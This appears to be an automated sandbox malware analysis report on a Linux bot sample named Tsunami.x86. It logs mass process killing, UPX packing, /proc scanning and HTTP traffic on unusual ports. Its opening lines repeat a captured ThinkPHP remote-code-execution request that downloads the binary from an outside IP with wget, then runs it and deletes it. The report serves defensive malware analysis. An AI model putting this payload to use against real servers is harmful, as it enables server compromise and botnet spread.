    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

    System Summary:

    barindex
    Sample tries to kill many processes (SIGKILL)
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2208, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2275, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2281, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2289, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2294, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5272, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5572, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5855, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5858, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6122, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6242, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6312, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6315, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6583, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6700, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6715, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6731, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6992, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6997, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7118, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7129, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7135, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7143, result: successful
    Source: LOAD without section mappingsProgram segment: 0xc01000
    Source: 5246.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5244.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2208, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2275, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2281, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2289, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2294, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5272, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5572, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5855, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5858, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6122, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6242, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6312, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6315, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6583, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6700, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6715, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6731, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6992, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6997, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7118, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7129, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7135, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7143, result: successful
    Source: Initial sampleString containing 'busybox' found: `busybox+w|t+
    Source: Tsunami.x86Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: classification engineClassification label: mal88.spre.troj.evad.linX86@0/106@0/0

    Data Obfuscation:

    barindex
    Sample is packed with UPX
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

    Persistence and Installation Behavior:

    barindex
    Sample reads /proc/mounts (often used for finding a writable filesystem)
    Source: /usr/bin/dbus-daemon (PID: 5795)File: /proc/5795/mountsJump to behavior
    Source: /usr/bin/dbus-daemon (PID: 6283)File: /proc/6283/mountsJump to behavior
    Source: /usr/bin/dbus-daemon (PID: 7540)File: /proc/7540/mountsJump to behavior
    Source: /bin/sh (PID: 5728)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 6252)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 6708)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 7126)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6265/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6265/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/stat
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/environ
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/sched
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6259/comm
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/6992/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1582/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2033/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2275/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/3088/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1579/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1612/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1699/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1335/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1334/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1576/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2302/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/3236/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/910/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/912/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/912/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5139/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/759/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/759/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/517/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2307/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/918/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/918/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5272/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/6122/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/6242/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4463/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4464/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4465/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1594/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2285/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2281/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5150/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1349/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/761/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/761/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1622/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5709/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/884/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/884/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2038/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1586/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1465/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1344/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1860/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1463/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/800/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/800/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5148/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/6997/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/801/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/801/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5285/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5200/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5201/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5840/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/3021/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/491/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/491/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2294/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5838/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5839/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/772/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/772/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1599/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/774/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/774/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1477/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/654/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/896/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1476/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1872/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2048/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/655/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/1475/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/2289/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/656/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/777/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/777/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/657/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4466/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/5038/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/658/fd
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/658/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4500/exe
    Source: /tmp/Tsunami.x86 (PID: 5253)File opened: /proc/4469/exe
    Source: /lib/systemd/systemd (PID: 6265)Systemctl executable: /bin/systemctl -> /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)Directory: /root/.cacheJump to behavior
    Source: /usr/lib/gdm3/gdm-x-session (PID: 5738)Directory: /var/lib/gdm3/.cacheJump to behavior
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6256)Directory: /var/lib/gdm3/.cacheJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)Directory: /root/.cacheJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)Directory: /root/.cacheJump to behavior
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6717)Directory: /var/lib/gdm3/.cacheJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)Directory: /root/.cache
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
    Source: /usr/share/language-tools/language-options (PID: 5726)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/lib/xorg/Xorg (PID: 5773)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/lib/xorg/Xorg (PID: 6278)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/share/language-tools/language-options (PID: 6248)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/share/language-tools/language-options (PID: 6706)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/lib/xorg/Xorg (PID: 7533)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/share/language-tools/language-options (PID: 7124)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/bin/xfce4-session (PID: 5712)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
    Source: /usr/lib/xorg/Xorg (PID: 5742)Log file created: /var/log/Xorg.0.log
    Source: /usr/lib/xorg/Xorg (PID: 6258)Log file created: /var/log/Xorg.0.log
    Source: /usr/lib/xorg/Xorg (PID: 6719)Log file created: /var/log/Xorg.0.logJump to dropped file

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 38292 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49558 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55738 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48252 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35678 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43132 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53162 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56702 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 55555
